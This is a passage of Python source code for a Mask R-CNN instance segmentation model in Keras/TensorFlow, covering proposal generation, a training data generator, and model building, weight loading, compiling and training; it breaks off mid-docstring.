def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):
"""Generates ROI proposals similar to what a region proposal network
would generate.
image_shape: [Height, Width, Depth]
count: Number of ROIs to generate
gt_class_ids: [N] Integer ground truth class IDs
gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.
Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.
"""
# placeholder
rois = np.zeros((count, 4), dtype=np.int32)
# Generate random ROIs around GT boxes (90% of count)
rois_per_box = int(0.9 * count / gt_boxes.shape[0])
for i in range(gt_boxes.shape[0]):
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]
h = gt_y2 - gt_y1
w = gt_x2 - gt_x1
# random boundaries
r_y1 = max(gt_y1 - h, 0)
r_y2 = min(gt_y2 + h, image_shape[0])
r_x1 = max(gt_x1 - w, 0)
r_x2 = min(gt_x2 + w, image_shape[1])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))
x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:rois_per_box]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:rois_per_box]
if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
box_rois = np.hstack([y1, x1, y2, x2])
rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois
# Generate random ROIs anywhere in the image (10% of count)
remaining_count = count - (rois_per_box * gt_boxes.shape[0])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))
x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:remaining_count]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:remaining_count]
if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
global_rois = np.hstack([y1, x1, y2, x2])
rois[-remaining_count:] = global_rois
return rois
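# Usage sketch (hypothetical count; boxes are in pixel coordinates):
#
#   rpn_rois = generate_random_rois(image.shape, 256, gt_class_ids, gt_boxes)
#   # rpn_rois.shape == (256, 4)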
class DataGenerator(KU.Sequence):
"""An iterable that returns images and corresponding target class ids,
bounding box deltas, and masks.
It inherits from keras.utils.Sequence to avoid data redundancy when multiprocessing=True.
dataset: The Dataset object to pick data from
config: The model config object
shuffle: If True, shuffles the samples before every epoch
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
random_rois: If > 0 then generate proposals to be used to train the
network classifier and mask heads. Useful if training
the Mask RCNN part without the RPN.
batch_size: How many images to return in each call
detection_targets: If True, generate detection targets (class IDs, bbox
deltas, and masks). Typically for debugging or visualizations because
in training, detection targets are generated by DetectionTargetLayer.
Returns a Python iterable. Upon calling __getitem__() on it, the
iterable returns two lists, inputs and outputs. The contents
of the lists differ depending on the received arguments:
inputs list:
- images: [batch, H, W, C]
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)
- rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
- gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs
- gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]
- gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width
are those of the image unless use_mini_mask is True, in which
case they are defined in MINI_MASK_SHAPE.
outputs list: Usually empty in regular training. But if detection_targets
is True then the outputs list contains target class_ids, bbox deltas,
and masks.
"""
def __init__(self, dataset, config, shuffle=True, augmentation=None,
random_rois=0, batch_size=1, detection_targets=False):
self.dataset = dataset
self.config = config
self.shuffle = shuffle
self.augmentation = augmentation
self.random_rois = random_rois
self.batch_size = batch_size
self.detection_targets = detection_targets
self.image_ids = np.copy(dataset.image_ids)
# Anchors
# [anchor_count, (y1, x1, y2, x2)]
self.backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)
self.anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
self.backbone_shapes,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
def __len__(self):
return int(np.ceil(len(self.image_ids) / float(self.batch_size)))
def __getitem__(self, idx):
b = 0 # batch item index
image_index = -1
while b < self.batch_size:
# Increment index to pick next image. Shuffle if at the start of an epoch.
image_index = (image_index + 1) % len(self.image_ids)
if self.shuffle and image_index == 0:
np.random.shuffle(self.image_ids)
# Get GT bounding boxes and masks for image.
image_id = self.image_ids[image_index]
image, image_meta, gt_class_ids, gt_boxes, gt_masks = \
load_image_gt(self.dataset, self.config, image_id,
augmentation=self.augmentation,
use_mini_mask=self.config.USE_MINI_MASK)
# Skip images that have no instances. This can happen in cases
# where we train on a subset of classes and the image doesn't
# have any of the classes we care about.
if not np.any(gt_class_ids > 0):
continue
# RPN Targets
rpn_match, rpn_bbox = build_rpn_targets(image.shape, self.anchors,
gt_class_ids, gt_boxes, self.config)
# Mask R-CNN Targets
if self.random_rois:
rpn_rois = generate_random_rois(
image.shape, self.random_rois, gt_class_ids, gt_boxes)
if self.detection_targets:
rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = \
build_detection_targets(
rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
# Init batch arrays
if b == 0:
batch_image_meta = np.zeros(
(self.batch_size,) + image_meta.shape, dtype=image_meta.dtype)
batch_rpn_match = np.zeros(
[self.batch_size, self.anchors.shape[0], 1], dtype=rpn_match.dtype)
batch_rpn_bbox = np.zeros(
[self.batch_size, self.config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)
batch_images = np.zeros(
(self.batch_size,) + image.shape, dtype=np.float32)
batch_gt_class_ids = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES), dtype=np.int32)
batch_gt_boxes = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES, 4), dtype=np.int32)
batch_gt_masks = np.zeros(
(self.batch_size, gt_masks.shape[0], gt_masks.shape[1],
self.config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)
if self.random_rois:
batch_rpn_rois = np.zeros(
(self.batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)
if self.detection_targets:
batch_rois = np.zeros(
(self.batch_size,) + rois.shape, dtype=rois.dtype)
batch_mrcnn_class_ids = np.zeros(
(self.batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)
batch_mrcnn_bbox = np.zeros(
(self.batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)
batch_mrcnn_mask = np.zeros(
(self.batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)
# If more instances than fit in the array, sub-sample from them.
if gt_boxes.shape[0] > self.config.MAX_GT_INSTANCES:
ids = np.random.choice(
np.arange(gt_boxes.shape[0]), self.config.MAX_GT_INSTANCES, replace=False)
gt_class_ids = gt_class_ids[ids]
gt_boxes = gt_boxes[ids]
gt_masks = gt_masks[:, :, ids]
# Add to batch
batch_image_meta[b] = image_meta
batch_rpn_match[b] = rpn_match[:, np.newaxis]
batch_rpn_bbox[b] = rpn_bbox
batch_images[b] = mold_image(image.astype(np.float32), self.config)
batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids
batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes
batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks
if self.random_rois:
batch_rpn_rois[b] = rpn_rois
if self.detection_targets:
batch_rois[b] = rois
batch_mrcnn_class_ids[b] = mrcnn_class_ids
batch_mrcnn_bbox[b] = mrcnn_bbox
batch_mrcnn_mask[b] = mrcnn_mask
b += 1
inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,
batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]
outputs = []
if self.random_rois:
inputs.extend([batch_rpn_rois])
if self.detection_targets:
inputs.extend([batch_rois])
# Keras requires that output and targets have the same number of dimensions
batch_mrcnn_class_ids = np.expand_dims(
batch_mrcnn_class_ids, -1)
outputs.extend(
[batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])
return inputs, outputs
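# Usage sketch (assumes a prepared Dataset object):
#
#   train_generator = DataGenerator(dataset, config, shuffle=True,
#                                   batch_size=config.BATCH_SIZE)
#   inputs, outputs = train_generator[0]
#   # inputs: [images, image_meta, rpn_match, rpn_bbox,
#   #          gt_class_ids, gt_boxes, gt_masks]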
############################################################
# MaskRCNN Class
############################################################
class MaskRCNN():
"""Encapsulates the Mask RCNN model functionality.
The actual Keras model is in the keras_model property.
"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
"""Build Mask R-CNN architecture.
mode: Either "training" or "inference". The inputs and
outputs of the model differ accordingly.
"""
assert mode in ['training', 'inference']
# Image size must be divisible by 2 multiple times
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
raise Exception("Image size must be divisible by 2 at least 6 times "
"to avoid fractions when downscaling and upscaling. "
"For example, use 256, 320, 384, 448, 512, ... etc. ")
# Inputs
input_image = KL.Input(
shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image")
input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],
name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes, and masks)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
gt_boxes = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_gt_boxes)
# 3. GT Masks (zero padded)
# [batch, height, width, MAX_GT_INSTANCES]
if config.USE_MINI_MASK:
input_gt_masks = KL.Input(
shape=[config.MINI_MASK_SHAPE[0],
config.MINI_MASK_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
else:
input_gt_masks = KL.Input(
shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
elif mode == "inference":
# Anchors in normalized coordinates
input_anchors = KL.Input(shape=[None, 4], name="input_anchors")
# Build the shared convolutional layers.
# Bottom-up Layers
# Returns a list of the last layers of each stage, 5 in total.
# The stage 1 output is not used here, so it is discarded below (the `_`).
if callable(config.BACKBONE):
_, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,
train_bn=config.TRAIN_BN)
else:
_, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,
stage5=True, train_bn=config.TRAIN_BN)
# Top-down Layers
# TODO: add assert to verify feature map sizes match what's in config
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)
P4 = KL.Add(name="fpn_p4add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])
P3 = KL.Add(name="fpn_p3add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])
P2 = KL.Add(name="fpn_p2add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])
# Attach 3x3 conv to all P layers to get the final feature maps.
P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2)
P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3)
P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4)
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5)
# P6 is used for the 5th anchor scale in RPN. Generated by
# subsampling from P5 with stride of 2.
P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5)
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
# Anchors
if mode == "training":
anchors = self.get_anchors(config.IMAGE_SHAPE)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)
# A hack to get around Keras's bad support for constants
# This class returns a constant layer
class ConstLayer(KE.Layer):
def __init__(self, x, name=None):
super(ConstLayer, self).__init__(name=name)
self.x = tf.Variable(x)
def call(self, input):
return self.x
anchors = ConstLayer(anchors, name="anchors")(input_image)
else:
anchors = input_anchors
# RPN Model
rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(
proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
config=config)([rpn_class, rpn_bbox, anchors])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
active_class_ids = KL.Lambda(
lambda x: parse_image_meta_graph(x)["active_class_ids"]
)(input_image_meta)
if not config.USE_RPN_ROIS:
# Ignore predicted ROIs and use ROIs provided as an input.
input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],
name="input_roi", dtype=np.int32)
# Normalize coordinates
target_rois = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_rois)
else:
target_rois = rpn_rois
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox, target_mask =\
DetectionTargetLayer(config, name="proposal_targets")([
target_rois, input_gt_class_ids, gt_boxes, input_gt_masks])
# Network Heads
# TODO: verify that this handles zero padded ROIs
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
# TODO: clean up (use tf.identify if necessary)
output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois)
# Losses
rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, mrcnn_class_logits, active_class_ids])
bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, mrcnn_bbox])
mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")(
[target_mask, target_class_ids, mrcnn_mask])
# Model
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks]
if not config.USE_RPN_ROIS:
inputs.append(input_rois)
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask,
rpn_rois, output_rois,
rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss]
model = KM.Model(inputs, outputs, name='mask_rcnn')
else:
# Network Heads
# Proposal classifier and BBox regressor heads
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in
# normalized coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])
# Create masks for detections
detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)
mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
model = KM.Model([input_image, input_image_meta, input_anchors],
[detections, mrcnn_class, mrcnn_bbox,
mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],
name='mask_rcnn')
# Add multi-GPU support.
if config.GPU_COUNT > 1:
from mrcnn.parallel_model import ParallelModel
model = ParallelModel(model, config.GPU_COUNT)
return model
def find_last(self):
"""Finds the last checkpoint file of the last trained model in the
model directory.
Returns:
The path of the last checkpoint file
"""
# Get directory names. Each directory corresponds to a model
dir_names = next(os.walk(self.model_dir))[1]
key = self.config.NAME.lower()
dir_names = filter(lambda f: f.startswith(key), dir_names)
dir_names = sorted(dir_names)
if not dir_names:
import errno
raise FileNotFoundError(
errno.ENOENT,
"Could not find model directory under {}".format(self.model_dir))
# Pick last directory
dir_name = os.path.join(self.model_dir, dir_names[-1])
# Find the last checkpoint
checkpoints = next(os.walk(dir_name))[2]
checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints)
checkpoints = sorted(checkpoints)
if not checkpoints:
import errno
raise FileNotFoundError(
errno.ENOENT, "Could not find weight files in {}".format(dir_name))
checkpoint = os.path.join(dir_name, checkpoints[-1])
return checkpoint
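# Usage sketch: resume from the most recent checkpoint (assumes at least one
# prior training run exists under model_dir):
#
#   model = MaskRCNN(mode="training", config=config, model_dir=MODEL_DIR)
#   model.load_weights(model.find_last(), by_name=True)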
def load_weights(self, filepath, by_name=False, exclude=None):
"""Modified version of the corresponding Keras function with
the addition of multi-GPU support and the ability to exclude
some layers from loading.
exclude: list of layer names to exclude
"""
import h5py
from tensorflow.python.keras.saving import hdf5_format
if exclude:
by_name = True
if h5py is None:
raise ImportError('`load_weights` requires h5py.')
with h5py.File(filepath, mode='r') as f:
if 'layer_names' not in f.attrs and 'model_weights' in f:
f = f['model_weights']
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
keras_model = self.keras_model
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
# Exclude some layers
if exclude:
layers = filter(lambda l: l.name not in exclude, layers)
if by_name:
hdf5_format.load_weights_from_hdf5_group_by_name(f, layers)
else:
hdf5_format.load_weights_from_hdf5_group(f, layers)
# Update the log directory
self.set_log_dir(filepath)
def get_imagenet_weights(self):
"""Downloads ImageNet trained weights from Keras.
Returns path to weights file.
"""
from keras.utils.data_utils import get_file
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\
'releases/download/v0.2/'\
'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
return weights_path
def compile(self, learning_rate, momentum):
"""Gets the model ready for training. Adds losses, regularization, and
metrics. Then calls the Keras compile() function.
"""
# Optimizer object
optimizer = keras.optimizers.SGD(
lr=learning_rate, momentum=momentum,
clipnorm=self.config.GRADIENT_CLIP_NORM)
# Add Losses
# First, clear previously set losses to avoid duplication
self.keras_model._losses = []
self.keras_model._per_input_losses = {}
loss_names = [
"rpn_class_loss", "rpn_bbox_loss",
"mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"]
for name in loss_names:
layer = self.keras_model.get_layer(name)
if layer.output in self.keras_model.losses:
continue
loss = (
tf.reduce_mean(layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_loss(loss)
# Add L2 Regularization
# Skip gamma and beta weights of batch normalization layers.
reg_losses = [
keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32)
for w in self.keras_model.trainable_weights
if 'gamma' not in w.name and 'beta' not in w.name]
self.keras_model.add_loss(tf.add_n(reg_losses))
# Compile
self.keras_model.compile(
optimizer=optimizer,
loss=[None] * len(self.keras_model.outputs))
# Add metrics for losses
for name in loss_names:
if name in self.keras_model.metrics_names:
continue
layer = self.keras_model.get_layer(name)
self.keras_model.metrics_names.append(name)
loss = (
tf.reduce_mean(layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_metric(loss, name, aggregation='mean')
def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):
"""Sets model layers as trainable if their names match
the given regular expression.
"""
# Print message on the first call (but not on recursive calls)
if verbose > 0 and keras_model is None:
log("Selecting layers to train")
keras_model = keras_model or self.keras_model
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
for layer in layers:
# Is the layer a model?
if layer.__class__.__name__ == 'Model':
print("In model: ", layer.name)
self.set_trainable(
layer_regex, keras_model=layer, indent=indent + 4)
continue
if not layer.weights:
continue
# Is it trainable?
trainable = bool(re.fullmatch(layer_regex, layer.name))
# Update layer. If layer is a container, update inner layer.
if layer.__class__.__name__ == 'TimeDistributed':
layer.layer.trainable = trainable
else:
layer.trainable = trainable
# Print trainable layer names
if trainable and verbose > 0:
log("{}{:20} ({})".format(" " * indent, layer.name,
layer.__class__.__name__))
def set_log_dir(self, model_path=None):
"""Sets the model log directory and epoch counter.
model_path: If None, or a format different from what this code uses
then set a new log directory and start epochs from 0. Otherwise,
extract the log directory and the epoch counter from the file
name.
"""
# Set date and epoch counter as if starting a new model
self.epoch = 0
now = datetime.datetime.now()
# If we have a model path with date and epochs use them
if model_path:
# Continue from where we left off. Get epoch and date from the file name
# A sample model path might look like:
# \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows)
# /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux)
regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5"
# Use string for regex since we might want to use pathlib.Path as model_path
m = re.match(regex, str(model_path))
if m:
now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),
int(m.group(4)), int(m.group(5)))
# Epoch number in file is 1-based, and in Keras code it's 0-based.
# So, adjust for that then increment by one to start from the next epoch
self.epoch = int(m.group(6)) - 1 + 1
print('Re-starting from epoch %d' % self.epoch)
# Directory for training logs
self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format(
self.config.NAME.lower(), now))
# Path to save after each epoch. Include placeholders that get filled by Keras.
self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format(
self.config.NAME.lower()))
self.checkpoint_path = self.checkpoint_path.replace(
"*epoch*", "{epoch:04d}")
def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,
augmentation=None, custom_callbacks=None):
"""Train the model.
train_dataset, val_dataset: Training and validation Dataset objects.
learning_rate: The learning rate to train with
epochs: Number of training epochs. Note that previous training epochs
are considered to be done already, so this actually determines
the epochs to train in total rather than in this particular
call.
layers: Allows selecting which layers to train. It can be:
- A regular expression to match layer names to train
- One of these predefined values:
heads: The RPN, classifier and mask heads of the network
all: All the layers
3+: Train Resnet stage 3 and up
4+: Train Resnet stage 4 and up
5+: Train Resnet stage 5 and up
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)
augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)
flips images right/left 50% of the time. You can pass complex
augmentations as well. For example, the augmentation below applies
50% of the time, and when it does it flips images right/left half
the time and adds a Gaussian blur with a random sigma in range 0 to 5:
augmentation = imgaug.augmenters.Sometimes(0.5, [
imgaug.augmenters.Fliplr(0.5),
imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))
])
custom_callbacks: Optional. Add custom callbacks to be called
with the keras fit_generator method. Must be list of type keras.callbacks.
"""
assert self.mode == "training", "Create model in training mode."
# Pre-defined layer regular expressions
layer_regex = {
# all layers but the backbone
"heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# From a specific Resnet stage and up
"3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# All layers
"all": ".*",
}
if layers in layer_regex.keys():
layers = layer_regex[layers]
# Data generators
train_generator = DataGenerator(train_dataset, self.config, shuffle=True,
augmentation=augmentation,
batch_size=self.config.BATCH_SIZE)
val_generator = DataGenerator(val_dataset, self.config, shuffle=True,
batch_size=self.config.BATCH_SIZE)
# Create log_dir if it does not exist
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
# Callbacks
callbacks = [
keras.callbacks.TensorBoard(log_dir=self.log_dir,
histogram_freq=0, write_graph=True, write_images=False),
keras.callbacks.ModelCheckpoint(self.checkpoint_path,
verbose=0, save_weights_only=True),
]
# Add custom callbacks to the list
if custom_callbacks:
callbacks += custom_callbacks
# Train
log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate))
log("Checkpoint Path: {}".format(self.checkpoint_path))
self.set_trainable(layers)
self.compile(learning_rate, self.config.LEARNING_MOMENTUM)
# Work-around for Windows: Keras fails on Windows when using
# multiprocessing workers. See discussion here:
# https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009
if os.name == 'nt':
workers = 0
else:
workers = multiprocessing.cpu_count()
self.keras_model.fit(
train_generator,
initial_epoch=self.epoch,
epochs=epochs,
steps_per_epoch=self.config.STEPS_PER_EPOCH,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=self.config.VALIDATION_STEPS,
max_queue_size=100,
workers=workers,
use_multiprocessing=(1 < workers),
)
self.epoch = max(self.epoch, epochs)
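# A minimal usage sketch (hypothetical dataset/config names), following the
# common two-stage recipe: train the heads first, then fine-tune all layers
# at a lower learning rate.
#
#   model.train(dataset_train, dataset_val,
#               learning_rate=config.LEARNING_RATE, epochs=20, layers="heads")
#   model.train(dataset_train, dataset_val,
#               learning_rate=config.LEARNING_RATE / 10, epochs=40, layers="all")
#
# Because `epochs` is a total, the second call trains 20 additional epochs.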
def mold_inputs(self, images):
"""Takes a list of images and modifies them to the format expected
as an input to the neural network.
images: List of image matrices [height,width,depth]. Images can have
different sizes.
Returns 3 Numpy matrices:
molded_images: [N, h, w, 3]. Images resized and normalized.
image_metas: [N, length of meta data]. Details about each image.
